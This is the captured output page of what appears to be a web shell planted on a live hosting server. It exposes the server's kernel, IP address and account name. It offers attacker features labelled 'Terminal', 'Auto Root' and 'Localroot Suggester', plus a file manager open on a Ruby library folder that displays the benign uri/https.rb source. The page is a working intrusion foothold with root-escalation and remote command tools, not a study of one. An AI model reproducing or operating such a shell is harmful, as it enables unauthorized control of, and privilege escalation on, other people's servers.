Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
uri /
Delete
Unzip
Name
Size
Permission
Date
Action
common.rb
17.16
KB
-rw-r--r--
2007-12-10 04:31
ftp.rb
5.13
KB
-rw-r--r--
2008-04-19 07:56
generic.rb
23.59
KB
-rw-r--r--
2011-05-20 18:29
http.rb
2.59
KB
-rw-r--r--
2007-02-14 21:41
https.rb
498
B
-rw-r--r--
2007-02-14 21:41
ldap.rb
3.26
KB
-rw-r--r--
2007-02-12 18:01
ldaps.rb
286
B
-rw-r--r--
2008-04-15 05:41
mailto.rb
6.53
KB
-rw-r--r--
2007-02-14 21:41
Save
Rename
# # = uri/https.rb # # Author:: Akira Yamada <akira@ruby-lang.org> # License:: You can redistribute it and/or modify it under the same term as Ruby. # Revision:: $Id: https.rb 11747 2007-02-15 02:41:45Z knu $ # require 'uri/http' module URI # The default port for HTTPS URIs is 443, and the scheme is 'https:' rather # than 'http:'. Other than that, HTTPS URIs are identical to HTTP URIs; # see URI::HTTP. class HTTPS < HTTP DEFAULT_PORT = 443 end @@schemes['HTTPS'] = HTTPS end